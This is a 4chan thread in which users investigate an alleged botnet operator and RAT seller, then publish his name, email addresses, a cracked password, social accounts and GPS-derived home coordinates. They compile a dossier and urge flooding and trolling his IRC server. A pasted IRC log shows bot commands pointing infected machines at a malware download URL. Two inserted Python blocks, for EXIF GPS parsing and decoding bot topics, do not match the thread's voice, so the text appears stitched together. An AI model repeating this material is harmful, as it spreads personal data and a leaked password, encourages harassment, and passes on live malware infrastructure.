See all those threads spamming /b/, /g/, and just about everywhere else advertising a "facebook hacker"? The spammer samefags the threads saying "omg it really works thanks OP" but obviously it's a trojan that puts your computer in a botnet. The seller of the trojan, and the head admin of the botnet, is this guy Brendan Johnston. He runs the server all the 4chan bots are currently connecting to. The bot is known as Insomnia Bot.

He also sells the Blackshades RAT, which is very popular.

Odds are he's friends with or has some deal or contract with the original programmer of Insomnia.

>>24452428
He's not actually a programmer at all, he's more of a ringleader. He probably makes deals with various programmers and splits profits with them. He doesn't write the bots and I doubt he writes the crypters, and he probably doesn't even know how to.

>> No.24452453

>>24452446
>dat sage
Looks like HE is among us!

>> No.24452464

>>24452453
the thread is active and i'm not really contribooting, no need

>> No.24452470

>>24452453
Sages can be polite.

>> No.24452472

>>24452452
-FBI busts johnston
-follow da money
-???
-profit
domains and servers appear to be bought by johnston
others in on it will have to connect to these servers

plus johnston may flip over for a deal

>> No.24452479

>>24452453
You know, on other chans, a sage-like reply means "My post isn't important enough to bump"

>> No.24452480

>>24452435
> reading the thread is hard

>> No.24452481

>>24452450
Yes.

Do it. Fucking do it.

Flood the IRC server to hell.

>>24452446
It's mostly on /b/ I think. But I've seen at least 4 threads on /g/ with the spam.

>> No.24452486

>>24451489
http://bigkesh.com/

and his programming company!

>> No.24452494

So where is the exe and can I decompile it if it hasn't already?

>> No.24452502

I found his facebook profile.

>> No.24452514

Hmm, so BV1 is the person who makes a living from .NET malware? Haha, this just makes me laugh so hard man, that's funny.

>>24452325
If you have no ethics and basic C++ knowledge (fuck, even vb.net will be okay, this guy is using .net) then yeah you can make a fair amount of money depending on the size of your botnet. People monetize them in different ways:

-PPI affiliate networks
-buttcoins
-SEO "services" (facebook likes, craigslist spam etc)
-sell the malware (this idiot does)

>>24452342
so a Finnish guy bought the malware from hackforums?

>>24452428
>sells credit cards harvested by his botnet
>.NET
>implying webinjects are possible in .NET

AHAHAHAHAHAHAHAHAHAHAABAHAHAHAHAHAH OKAY

He might have bought himself a copy of Citadel/Spyeye, then maybe he could have, but it's very highly unlikely that he did.

>>24452486
OH GOD HAHAHAH


>>24452502
>elite .NET hacker
>facebook

Please please please link, I want to know what he looks like!

>> No.24452517

>>24452502
link it.

>> No.24452525

Is anyone going to forward this anywhere that it'll actually get attention?

>> No.24452541

>>24452494
Pretty much everything here.
http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

>> No.24452543

>>24452525
i'll make an irc flooder script and i'll make a /b/ thread probably

>> No.24452559

i know him, he's an hf skid

>>24452211
address
http://regex.info/exif.cgi?imgurl=http%3A%2F%2Fimg707.imageshack.us%2Fimg707%2F2923%2Fimg0617hz.jpg
http://maps.google.com/maps?f=q&q=loc:34.196167,-118.848667&t=k&spn=0.5,0.5

also youtube accounts
http://www.youtube.com/user/bmjslider
http://www.youtube.com/user/LegendBV1

>> No.24452579

http://www.threatexpert.com/report.aspx?md5=fc6de99a7ecb826eebef7fa0d3ec31bd

look at the outbound data
looks like it's relevant to licensing the bot

>> No.24452603

>>24452514
>AHAHAHAHAHAHAHAHAHAHAABAHAHAHAHAHAH OKAY
I don't see why you would overreact like this, it is very plausible. You don't actually need to do webinjects to capture credit cards.

see
>>24452390
They normally buy stuff like this with stolen credit cards, I don't see why you are so quick to disprove my suspicions, I just came to this thread and you're acting like a fag.

>> No.24452708

>>24452603
I was making fun of the fact that it was in .NET, I should have been more clear.

I can feel your butthurt. It's okay, you were wrong.

They CAN buy stuff like this with stolen credit cards but they don't, let me tell you why:

-.NET malware comes with password getters, you know when you store your password in Chrome/Firefox, they send all of that to their server.

>Look for runescape.com
>find few thousand accounts
>steal gold

That's all. I can guarantee you that anybody looking to steal CVV will not be using anything that's .NET

>> No.24452710

Send this faggot's dox to the FBI. Seriously.

>> No.24452723

>Well accomplishments... avoiding any major downtime from the cops hitting bshades.com was nice.
Apparently the cops are already trying to take down Blackshades. They'd actually go after this fag.

>> No.24452725

>>24452710
Already done.

>> No.24452738

>>24452723
http://thehfnews.blogspot.com/2012/02/113011-hf-news.html
>Michael Westen: Interesting - It's always interesting to learn why people pick their name. I picked mine because it was the main character on my favorite TV show. What inspired you to start [censored]?
>Orgy: Actually, BV1 started it. He built up the site and everything and then showed it to me. I figured it was a good idea, and passed it on to Lith in IRC. He advertised it on HF and it immediately gained a lot of popularity.

Can you guess what censored is? Protip: It's blackshades.

>> No.24452758

>>24452525
>>24452543
don't bother with a /b/ thread. if you do make one, simply make a thread linking to this one, saying the person responsible for the spam has been doxed. /b/ threads disappear too fast.

>>24452559
this guy leaves more tracks than a fucking tractor.

Emails so far:

[email protected]
[email protected]
[email protected]

AIM: Neu Army1

lancerimpact.dyndns.info he uses this as a personal server. Or at least he used to.

A password he used on a booter forum or something that was cracked when the db was dumped: byas40pz

Try that byas40pz pass on some of his accounts. It looks random and specific to that site but who knows.
He also has a huge number of domains.

Anything with "terror-squad" in it (.co, .info, and more)
Anything with "bv1" in it
thu.gs
some booter shit

He's got lots of usernames, accounts, and profiles. He loves Runescape. He loves hanging out on Runescape IRC servers. He loves scamming Runescape items and accounts. He's probably scammed real money as well.

I'll compile a full and complete dox later today.

>>24452710
We are. I'm not a narc but this guy is spamming 4chan and is a fucking idiot, so fuck him.

>>24452723
HAHAHA. I can just imagine the smile on a cybercrime unit cop's face after he reads this thread. It's like delivering glazed fucking donuts right to their doorstep. They don't even have to do any work.

>> No.24452763
File: 21 KB, 955x764, oh god im going to get heckered.png

oh god why did I do this

>> No.24452773

>>24452758
Moot removed limit on threads

>> No.24452774

>>24452763
Just use a proxy. Even Tor isn't blocked.

Btw, the others in the room are invisible.

>> No.24452784

Also, note:

Johnston has probably seen this thread by now. So keep that in mind.

>> No.24452812

I'm thinking about flooding his IRC with "Install Gentoo"

>> No.24452815

>>24452579
That's a blackshades connection. Just info from the infected computer.

>> No.24452820

>>24452784
you think he browses /g/?

>>24452758
>HAHAHA. I can just imagine the smile on a cybercrime unit cop's face after he reads this thread. It's like delivering glazed fucking donuts right to their doorstep. They don't even have to do any work.

hope whoever reported this linked to archive and not live 4chan

>> No.24452842

>>24452820
if the thread 404's, you are being redirected to the archive anyway

>> No.24452843

>>24452812
use the stallman interjection
it uses more bw

>> No.24452849

>>24452820
I doubt he browses /g/ but someone's probably linked it to him by now, either an acquaintance of his trying to help him (he's kind of a big deal on Hackforums, you see. ahahaha.) or someone trying to fuck with him and scare the shit out of him.

>> No.24452856

>>24452842
not automatically, unless you think the cops will have 4chan x installed, in which case, yeah, they will be redirected.

>> No.24452865

>>24452812
>>24452843
>use the stallman interjection
also use linus torvalds response to that.

>> No.24452876

>>24452856
Someone should just ctrl+S this thread or even send the plaintext to a few different California law enforcement agencies. Local police as well as the nearby FBI branches.

>> No.24452889

>>24452865
it has to conform to the irc protocol so multiple messages would need to be sent

>> No.24452893
File: 318 KB, 1600x1200, DSC1100.jpg

We're onto you, son.

>> No.24452897

If you did all that digging yourself, you could've extorted the fuck out of him by now.

>> No.24452914
File: 329 KB, 1680x1050, 1322682803891.png

>>24452893
Yeah, that's old as fuck.

>> No.24452915

>>24452897
/g/ is not 1 person

>> No.24452926

>>24452897
It was a group collaboration.

Also, extorting money out of a criminal is a bad idea. And will probably result in you getting shit from police later on. Someone could've maybe intimidated him into giving more info I guess. Too late now though.

>> No.24452929

>>24452897
why ?

>> No.24452934
File: 82 KB, 949x539, trolling.png

>>24452893
Before anyone gets too excited, it's a troll, old pic.

>>24452897
>try to extort someone who is likely in league with eastern Europeans, can't go to cops without crime coming out if they come after you

>> No.24452947

>>24452926
>extorting money out of a criminal is a bad idea

They can't exactly go to the police over it.

>> No.24452948

cant see no bots in there

>> No.24452951

>>24452893
GPS Latitude Ref North
GPS Longitude Ref West
GPS Longitude 76.771650 degrees W
GPS Latitude 39.108733 degrees N
GPS Position 39.108733 degrees N, 76.771650 degrees W
Modify Date 2012:04:21 10:15:02.792
4 days, 2 hours, 30 minutes, 47 seconds ago
Thumbnail Image (4,917 bytes binary data)


at least you tried
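The EXIF checks in this thread (>>24452559 pulling coordinates out of the bong photo through regex.info, and the GPS tags and modify date read out of the DSC1100.jpg troll picture just above) come down to walking the TIFF structure that Exif embeds in the image: IFD0 carries a pointer to a GPS sub-IFD, and four tags there hold latitude and longitude as degree/minute/second rationals plus N/S and E/W reference letters. The Python below is an added example, not code from anyone in this thread or from any tool named here. It constructs a minimal TIFF/Exif blob in memory (constructed test input, carrying the 39.108733 N, 76.771650 W fix that was read out of the troll picture) and parses it back into decimal degrees and the style of maps URL the thread used. It handles only the bare TIFF container; a JPEG wraps that container in an APP1 "Exif\0\0" segment that you would have to locate first. The practitioner's caveat is the one this thread already ran into: EXIF is plain metadata that any editor can rewrite or strip, so a coordinate in a photo is a lead, not proof of where or when it was taken.

```python
import struct

# Exif tag numbers (Exif 2.x): the GPS sub-IFD pointer that lives in IFD0, and
# the four GPS tags needed for a fix.  TIFF field types: ASCII=2, LONG=4, RATIONAL=5.
TAG_GPS_IFD = 0x8825
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004
TYPE_ASCII, TYPE_LONG, TYPE_RATIONAL = 2, 4, 5


def build_exif_gps(lat_dms, lat_ref, lon_dms, lon_ref):
    """Construct a minimal little-endian TIFF/Exif blob that carries only a GPS
    IFD.  This is test input for the parser below; real cameras write much more.
    lat_dms/lon_dms are three (numerator, denominator) pairs: deg, min, sec."""
    ifd0_off = 8                          # right after the 8-byte TIFF header
    gps_off = ifd0_off + 2 + 12 + 4       # IFD0: count, one entry, next-IFD link
    data_off = gps_off + 2 + 4 * 12 + 4   # GPS IFD: count, four entries, link
    blob = bytearray(b"II*\x00" + struct.pack("<I", ifd0_off))
    blob += struct.pack("<H", 1)
    blob += struct.pack("<HHII", TAG_GPS_IFD, TYPE_LONG, 1, gps_off)
    blob += struct.pack("<I", 0)          # no further IFD
    entries, rationals = [], bytearray()
    for tag, value in ((GPS_LAT_REF, lat_ref), (GPS_LAT, lat_dms),
                       (GPS_LON_REF, lon_ref), (GPS_LON, lon_dms)):
        if isinstance(value, str):
            # "N\0" fits in the 4-byte value field, so it is stored inline
            entries.append(struct.pack("<HHI4s", tag, TYPE_ASCII, 2, value.encode("ascii")))
        else:
            # three RATIONALs are 24 bytes: stored out of line, the field holds an offset
            entries.append(struct.pack("<HHII", tag, TYPE_RATIONAL, 3, data_off + len(rationals)))
            for num, den in value:
                rationals += struct.pack("<II", num, den)
    blob += struct.pack("<H", len(entries)) + b"".join(entries) + struct.pack("<I", 0)
    assert len(blob) == data_off
    return bytes(blob + rationals)


def _read_ifd(blob, off, e):
    """Return {tag: (type, count, raw 4-byte value field)} for the IFD at off."""
    (n,) = struct.unpack_from(e + "H", blob, off)
    return {tag: (typ, cnt, raw) for tag, typ, cnt, raw in
            (struct.unpack_from(e + "HHI4s", blob, off + 2 + 12 * i) for i in range(n))}


def _rationals(blob, e, count, raw):
    (off,) = struct.unpack(e + "I", raw)  # RATIONALs are 8 bytes each, never inline
    vals = struct.unpack_from(e + "%dI" % (2 * count), blob, off)
    return list(zip(vals[0::2], vals[1::2]))


def _to_decimal(dms, ref):
    deg = sum(num / den / 60 ** i for i, (num, den) in enumerate(dms))
    return -deg if ref in ("S", "W") else deg


def exif_gps_position(blob):
    """Return (latitude, longitude) in decimal degrees from a TIFF/Exif blob,
    or None when there is no GPS IFD or it lacks a complete fix."""
    if blob[:4] == b"II*\x00":
        e = "<"
    elif blob[:4] == b"MM\x00*":
        e = ">"
    else:
        raise ValueError("not a TIFF/Exif header")
    (ifd0_off,) = struct.unpack_from(e + "I", blob, 4)
    ifd0 = _read_ifd(blob, ifd0_off, e)
    if TAG_GPS_IFD not in ifd0:
        return None
    (gps_off,) = struct.unpack(e + "I", ifd0[TAG_GPS_IFD][2])
    gps = _read_ifd(blob, gps_off, e)
    if any(t not in gps for t in (GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON)):
        return None
    ref = lambda t: gps[t][2].split(b"\x00", 1)[0].decode("ascii")
    lat = _to_decimal(_rationals(blob, e, gps[GPS_LAT][1], gps[GPS_LAT][2]), ref(GPS_LAT_REF))
    lon = _to_decimal(_rationals(blob, e, gps[GPS_LON][1], gps[GPS_LON][2]), ref(GPS_LON_REF))
    return lat, lon


def maps_query(lat, lon):
    """Satellite-view URL in the same style the thread used for an EXIF fix."""
    return "http://maps.google.com/maps?f=q&q=loc:%.6f,%.6f&t=k" % (lat, lon)


if __name__ == "__main__":
    # Constructed input: the fix read out of the troll picture, 39.108733 N,
    # 76.771650 W, as the degree/minute/second rationals a camera would write.
    sample = build_exif_gps(((39, 1), (6, 1), (314388, 10000)), "N",
                            ((76, 1), (46, 1), (1794, 100)), "W")
    fix = exif_gps_position(sample)
    print(fix, maps_query(*fix))
</test>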

>> No.24452955

Why don't you all just make a channel in his IRC server to discuss faster.

>> No.24452964

Hey I'm in college for Computer Forensics, this could make a decent capstone project for me to submit later on.
May I offer my services in computer auditing OP?

>> No.24452967

>>24452947
they don't have a reason to believe you won't go to the cops anyways
you become a loose end

>> No.24452969

>>24452876
not saving the entire page with screengrabber

also this is going to the archives wether you like it or not

>> No.24452978
File: 25 KB, 500x311, 1331502924881.jpg

>>24452955
That's like pissing in a lion's mouth, mate.

>> No.24452989

>>24452964
He'd be able to read the logs of the channel, which is probably not a good idea.

If you guys really want we could start a chat on Rizon or something.

>> No.24452998

>>24452989
why not make it invite only with hostmasks on?

>> No.24453010

Oh one tip:
Try not to spook the guy. If he has any sense of paranoia, first thing he'll do is SHUT DOWN EVERYTHING.
Least that's what I'd do.

>> No.24453024

>>24453010

topic channels changed, he already knows.

>> No.24453042

>>24453010
it's already being broken down as we speak
that ircd is barren

>> No.24453043

>>24453024
Oh well too late.
Goodbye physical evidence.

>> No.24453057
File: 16 KB, 250x242, msdigcrimesunit.jpg

>>24451377
>is he going to get in legal trouble or are people just gonna order pizza to his house?

get v& by the Microsoft Active Response for Security (MARS) team

>> No.24453062

>>24442662
Was that the file2.exe thing? Someoen already posted the C# code at one point.

>> No.24453073

file2.exe appears to be an updated version of Insomnia.

I'm not sure why he seems to be switching between Blackshades and Insomnia.

>> No.24453093

>>24453043
He doesn't even control the server he's on, it's in fucking Europe. There are probably backup tapes since it's a shared host.

>> No.24453121

>>24453024
I'm still in chat and haven't seen any changes.
(10:48:00 AM) The topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU9pdzdqRHNBPT09fDk5ODYzMTQw
(11:06:33 AM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(11:36:33 AM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(12:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(12:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(1:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(1:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(2:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(2:28:44 PM) You are now known as [CENSORED]
(2:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(3:06:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(3:36:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(4:06:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(4:36:32 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe

>> No.24453142
File: 27 KB, 265x150, DCU_Botnets.jpg

>>24452000
No one is outside Microsoft jurisdiction.

"Project MARS is a joint effort between the Microsoft Digital Crimes Unit, Microsoft Malware Protection Center, Customer Support Services and Trustworthy Computing. Recent examples of MARS include: Operation b49 (the Waledac takedown), Operation b107 (the Rustock takedown) and Operation b79 (the Kelihos takedown). "

https://www.microsoft.com/government/ww/safety-defense/initiatives/Pages/dcu-economic-crime.aspx

>> No.24453154

meh nothing will happen, except buy new servers.

>> No.24453178

>>24453121
The only topic that has changed is the one in #b8896

(4:22:31 PM) The topic for #b8896 is: ellUTmlzeVJ6SmZNaHMyRXpJdk1pc3lZfDQyOTUxODY4
(4:24:19 PM) mode (+b *!*[email protected]*.8817CC10.22486F08.IP) by b
(4:32:27 PM) mode (+b *!*[email protected]*.hsd1.tx.comcast.net) by b
(4:32:38 PM) mode (+b DrMolesto!*@*) by b
(4:32:54 PM) mode (+qo b b) by ChanServ
(4:34:28 PM) b has changed the topic to: ellUTWpzeU16SVBNZ015T3pJL01nOHlBekkvTWc4eU16SS9NZ015RHpJek1qOHlBeklQTWpNeVB6Smc9fDQyOTUxODY4

>> No.24453185
File: 161 KB, 1366x658, faggot.jpg

I cried laughing sending him this.

>> No.24453186

>>24453142
Seriously, those guys are in deeper then any other investigation unit.
I wonder if they use windows or an adapted linux.

>> No.24453191

>>24452989
Well I'm down if you guys want to start a channel.

I would need all the information there is available right now, that can be discussed later though.

[email protected] if you need any help

>> No.24453192

I'm gathering information about the websites you gave out guys.

thu.gs - 80.82.64.71

Located in the Netherlands.

ISP is the Ecatel Network.

Ports open:
  21 (ftp)
  25 (smtp)
  53 (domain)
  80 (HTTP)
  110 (POP3)
  8080 (http proxy)

>> No.24453194

>>24453178

what the hell does it mean

>> No.24453209

>>24453194
Botnet commands?

>> No.24453212

>>24453192
Could be an offshoot of the gone-bad division of what was Anonymous in the Low Countries.

>> No.24453216

>>24453154
The payment info, etc. are all tied to him. Plus now that his ID is known it's most likely probable cause for ISP logs and such.

>> No.24453239

>>24453194
It's not base64 or rot13

shit, that's all I know.

I'm just sitting in this thread googling all the vocabulary.

>> No.24453255

oh god im scared to join the channel

some take screenshots

>> No.24453288

>>24453194
The L33T topic encryption. Just run the bot in a vm and sniff it to see what sites it visits and what files it downloads.

>> No.24453307
File: 79 KB, 1331x605, afsfd.png

>>24453255

>> No.24453309

>>24453212

Or a European being a little script kiddie.

>> No.24453312

>>24453255
you don't join the channel with out a VPN or proxy.
Even if he made a botnet, which I am highly starting to doubt seeing his weak-ass protection of send locations, you're perfectly fine with a proxy.

I don't think the people who made it are in the channel.

>> No.24453320

>>24453178

A lot of the old topic is still in the new topic. Wonder if it's just a simple XOR based encryption. Yeah, that was me that got banned twice. I was sitting in the channel for 4 hours doing nothing. I went onto a proxy with the same name and got banned again within a few sec of joining, so someone is actively looking at that channel.
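The topic strings in >>24453178 and the guesses about them in >>24453239 and the post just above can be settled by decoding rather than eyeballing. The Python below is an added example, not code from this thread or from the bot's author: it takes the two #b8896 topics quoted above, peels them, and reports what is left. Both are standard base64. One decode yields a second base64 string, a '|' and a decimal number (42951868 in both topics); the second decode yields UTF-8 text whose characters all fall in U+0300..U+034F, so each character carries one byte value below 0x50. The first and last of those values are the same in both topics and only the middle changes, which looks like a framed payload under some per-character transform. What that transform is (the XOR guess above, or something else) and what the number after '|' means are open questions the script does not answer; it only strips the encoding layers so the inner bytes can be looked at. The earlier #BV1 topic in >>24453121 has the same outer <base64>|<number> shape, with trailer 99863140, but was not run through this script.

```python
import base64

# Two consecutive topics of #b8896, copied from the channel log quoted in this
# thread: the 4:22 PM topic and the 4:34 PM replacement set by "b".
TOPIC_BEFORE = "ellUTmlzeVJ6SmZNaHMyRXpJdk1pc3lZfDQyOTUxODY4"
TOPIC_AFTER = ("ellUTWpzeU16SVBNZ015T3pJL01nOHlBekkvTWc4eU16SS9NZ015RHpJ"
               "ek1qOHlBeklQTWpNeVB6Smc9fDQyOTUxODY4")


def peel_topic(topic):
    """Strip the two encoding layers of a bot topic.

    Layer 1: the whole topic is standard base64 of  <inner>|<decimal number>.
    Layer 2: <inner> is standard base64 of UTF-8 text.
    Returns (code_points, trailer): the Unicode code points of the inner text
    and the decimal string after '|'.  The transform that produced the inner
    text is not identified here.
    """
    outer = base64.b64decode(topic, validate=True).decode("ascii")
    inner_b64, sep, trailer = outer.rpartition("|")
    if sep != "|" or not trailer.isdigit():
        raise ValueError("topic is not <base64>|<number> after one decode")
    inner_text = base64.b64decode(inner_b64, validate=True).decode("utf-8")
    return [ord(c) for c in inner_text], trailer


def payload_bytes(code_points):
    """In both captured topics every inner character lies in U+0300..U+03FF,
    i.e. it carries a single byte in its low 8 bits.  Return those bytes, or
    None if the pattern does not hold so the caller knows the assumption broke."""
    if all(0x300 <= cp <= 0x3FF for cp in code_points):
        return bytes(cp - 0x300 for cp in code_points)
    return None


def summarize(topic):
    """Everything worth comparing between two topics, as one dict."""
    cps, trailer = peel_topic(topic)
    payload = payload_bytes(cps)
    return {
        "trailer": trailer,
        "length": len(cps),
        "first": cps[0],
        "last": cps[-1],
        "payload_hex": payload.hex() if payload is not None else None,
    }


if __name__ == "__main__":
    for name, topic in (("before", TOPIC_BEFORE), ("after", TOPIC_AFTER)):
        print(name, summarize(topic))
```

Run it and compare the two payload_hex strings: both start with 44 and end with 18, both carry the same trailer, and the nine-byte payload grows to twenty-two bytes when "b" changes the topic. That is as far as the encoding takes you; recovering the command itself would mean reversing the bot's own transform, which the .NET binary discussed at the top of the thread is the place to look for.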

>> No.24453328

>>24453307
>install gentoo
HAHAHA

>> No.24453330

>>24453309
Any idea on the server's whereabouts? I could visit, it's only a few hours from me.

>> No.24453347
File: 2.90 MB, 290x189, 1318650104775.gif

>ellUTWpzeU16SVBNZ015T3pJL01nOHlBekkvTWc4eU16SS9NZ015RHpJek1qOHlBeklQTWpNeVB6Smc9fDQyOTUxODY4

>> No.24453350

>>24453330
Talking to ISP is also an option.

>> No.24453354
File: 68 KB, 677x721, dammit.png

>>24453328
>That feel when you get banned

>> No.24453364

Guys do not join without a proxy.

>> No.24453377

>>24453364
Why not?

>> No.24453380
File: 65 KB, 505x506, madness.png

>>24453255

>> No.24453386

>>24453377
Aggravating skiddies is just generally a shitty idea.

>> No.24453391

>>24453354

looks like b is the one whos watching and will tell the other guy

mother fucker

>> No.24453401

>>24453354
#lamers is a better place for you ?
This ain't hackers with angelina jolie, jesus.
No way in hell this guy made a botnet.

>> No.24453403

>>24453380
poor debbie ;____;

>> No.24453415

>>24453401

It's a standard kick message.

>> No.24453436

>>24453380
Oh wow! Richard Stallman is fighting for our freedomz!

>> No.24453446

>>24453403
Well atleast we have a decent example in the pic.
>>24453415 i just get "your banned".

>> No.24453478

>>24453401
protip: its not hard.

>> No.24453479

nothing i hate more than bot masters.

troll them two fuckers

>> No.24453499

What's the mIRC again? I tried we.be.thu+443 but the server is down I think.

>> No.24453504

Why not take over the botnet and use it to spam Stallman interjections all over the internet?

>> No.24453509

>>24453499
did you include the .gs?

>> No.24453517

Someone PMed me. I'm richard stallman teehee

>> No.24453530

>>24453330

See: >>24453192

>> No.24453533

>>24453517
ahahahaha
what did they pm you?

>> No.24453542
File: 41 KB, 647x688, saddsasafdf.png

>>24453533

>> No.24453555

>>24453517
gentoo is an enemy of your freedom, just thought I'd let you know.

>> No.24453580

>>24453509

Yeah, I get a cannot connect. Maybe he's on to us?

>> No.24453603

whatever you are going to do with their IRC
DO NOT link them here. just in case they don't know yet

>> No.24453617

>>24453580

The b guy is the active one in the server and banned me, i guess he knows and is passing it on.

>> No.24453618

>>24453603
I will not link them here.

I'm just fucking with them.

>> No.24453623

>>24453580
we.be.thu.gs port 443

>> No.24453659

Their bot seems to have a nice internet connection
([email protected])

>> No.24453674

yeah IRC works fine but you have to connect to the right port

/server we.be.thu.gs:+443

>> No.24453682

>>24453659
>lsanca.fios.verizon.net

lol mini data center in the botnet

>> No.24453702

>>24453504
Thanks, seems to be an outsourced server to one of the bigger ISPs.
ECatel isn't that well known, and seems to relate to http://alibabahost.com/.

and for some reason the host on the 80.82.64.71 IP is called www.wrestling2watch.com, and it seems the URL is too large for the server or my proxy's screwing up again, could be because of the encryption.

>> No.24453721
File: 62 KB, 666x647, #us.png

Everyone get in #US

>> No.24453733

>>24453721
Hahahah...

>> No.24453757

>>24453733
/exec -o cat /dev/urandom

>> No.24453768

>>24453623

we.be.thu.gs+443: Could not resolve hostname.

>> No.24453778

first server i have seen in a while to be using SSL, cant sniff the server.

>> No.24453792

>>24453768
forgot the :

>> No.24453801

lol I don't even know how to move rooms in IRC, how do I get from the main room to #US?

>> No.24453810

>>24453801
type /j #us

>> No.24453813

>>24453768
>+
:

>> No.24453820

>>24453801

You shouldn't be in it in the first place.

>> No.24453866

>>24453702


I'll start scanning ip addresses. Let me look at:

[Name.Com ASCII-art banner]
On a first name basis with the rest of the world.

Get your domains at Name.com.


Domain Name: alibabahost.com
Registrar: Name.com LLC

Expiration Date: 2015-08-08 11:59:53
Creation Date: 2009-08-08 11:59:53

Name Servers:
ns1.alibabahost.com
ns2.alibabahost.com

REGISTRANT CONTACT INFO
Green Apples Software & WebSolutions Pvt Ltd.
Anurag Mishra
F2, NO-30,ITI Layout
New BEL Road
Bangalore
Karnataka
560054
IN
Phone: +91.9741887870
Email Address: [email protected]

ADMINISTRATIVE CONTACT INFO
Green Apples Software & WebSolutions Pvt Ltd.
Anurag Mishra
F2, NO-30,ITI Layout
New BEL Road
Bangalore
Karnataka
560054
IN
Phone: +91.9741887870
Email Address: [email protected]

>> No.24453870

>>24453757
thanks.

>> No.24453881
File: 50 KB, 616x668, 9fag.png

Am I doing it right?

>> No.24453897

>>24453866
I got to that but it stops right there.
Although it's funny, it must be a very small company.

>> No.24453899

>>24453813

Hmm...

we.be.thu.gs: Terminated

>> No.24453903
File: 763 KB, 1024x768, Koala.jpg

I can guarantee server will still be up, it seems like it's the first time /g/ has seen a botnet.

>> No.24453925

>>24453903
I have never seen one, just a few keyloggers and normal destroy-and-send viruses.
This is new.

>> No.24453929
File: 98 KB, 531x787, EXT4D_Exterminator.jpg

someone called?

>> No.24453974
File: 38 KB, 510x507, 1337hax.png

They're going to wonder why they have 10000000 page long logs of this

>> No.24454005

>>24453974

bv1 channel is unsecured compared to the other.

>> No.24454020

holy shit. is it just me or is the server lagging like hell?
received a ping request about a minute later

>> No.24454039

>>24454020
Which, we have a crazy total?

>> No.24454061

>>24454005
Of course, the blackshades is just a gathering site.
You didn't expect a control center to have an open door did you ?

>> No.24454093

I can't get on to this with a the amount of proxies I've tried - what is everyone else using?

>> No.24454097

>>24453499
>What's the mIRC again?
>mIRC
Oh, nevermind, I'm talking to a tripfag.

>> No.24454102

So has the joke died down yet or is it all that's remaining? Did we find out anything new?

>> No.24454125

>>24454093
VPN

>> No.24454152

>>24454093
vpn and a proxy. should be enough for this shit

>> No.24454159

>>24454093
TOR browser

>> No.24454188

>>24454159
I totally forgot about that, though reading it in an earlier post
>>24454152
>>24454125
I'm not going to pay for a vpn, just to piss someone off

>> No.24454217
File: 43 KB, 491x574, spam.png

/g/, the kings of spam

>> No.24454221

anybody registered for HF who can tell us what BV1 posted in this thread?

or if he knows yet?

>> No.24454224

Who is always posting this? >>24453157

>> No.24454287

>>24454102
To this point we got :
-His alias (Blackshades (red-flagged by a government) method of typing confirms his gender as male, we also have knowledge of a second person in the IRC).
-His IRC
-His method
-His official ISP
- Several Old emails and an AIM, old server. (see >>24452758)


About him :
-Script kiddie level (no acknowledged person would have left the IRC open with this simple a password, he even didn't talk to us on IRC)
-Runescape lover/scammer (his age can range from 15 - 30, near the earliest years, seeing his obsession with status on "blackshades").
-Seemingly either from Canada (if he was dumb enough to use an accustomed mail provider when he first started), or lives in the Netherlands (ISP location of a server).
-The site and himself probably are red-flagged and could be taken down without too much fuss from any government.

----
Anyone have something to add ?

>> No.24454311

>>24454224
Not related although same method of spam.

>> No.24454315

Meh, when he was getting fixed, and we were going down the rabbit hole, this was fun.

But now that school is out and the toddlers are filling his logs with bullshit, this is now a possibly cool experiment gone sour.

Attribution may very well become impossible, because god knows what the botherder is going to do to change things up.

We lucked out because he had dated models, botnets aren't controlled via IRC anymore. We could have tried to get a bit further with where he was receiving the insomnia code from, hooked that to more shit... Then just lay waste to it all or get LE involved and watched the unraveling.

tl;dr - op delete the thread and wait until the murricans are asleep again please.

Also, he's using dropbox. You can find the rest of his files on each dropbox acct if you try.

>> No.24454316

>>24454287
He lives in california, we have his address.

>> No.24454336

>>24454316
Proof of find ?
No doxing without telling.

>> No.24454341

>>24454315
>dropbox
Does he have a Public folder!

>> No.24454349

>>24454336
here!
>>24451431
>>24452559

>> No.24454367

>>24454336
see >>24451329
more on what lead up to that above ITT

>> No.24454385

BV1 from HF today
>Considering HackForums pays for my life (apartment, car, insurance, and spending money) and I just spent my last weekend out of town with friends
Seriously lolskiddie.

>> No.24454396

To this point we got :
-His alias (Blackshades (red-flagged by a government) method of typing confirms his gender as male, we also have knowledge of a second person in the IRC).
-His IRC
-His method
-His official ISP
- Several Old emails and an AIM, old server. (see >>24452758)


About him :
-Script kiddie level (no acknowledged person would have left the IRC open with this simple a password, he even didn't talk to us on IRC)

-Runescape lover/scammer (his age can range from 15 - 30, near the earliest years, seeing his obsession with status on "blackshades").

-Place of residence: California (see >>24454316, >>24454349, and >>24451431, >>24452559)

-The site and himself probably are red-flagged and could be taken down without too much fuss from any government.

I'll incorporate the house number later.

>> No.24454492

>>24454396
Should we finalize a premature Dox ?

>> No.24454545

>>24454492
>>24454396
>>24454336
>>24454341

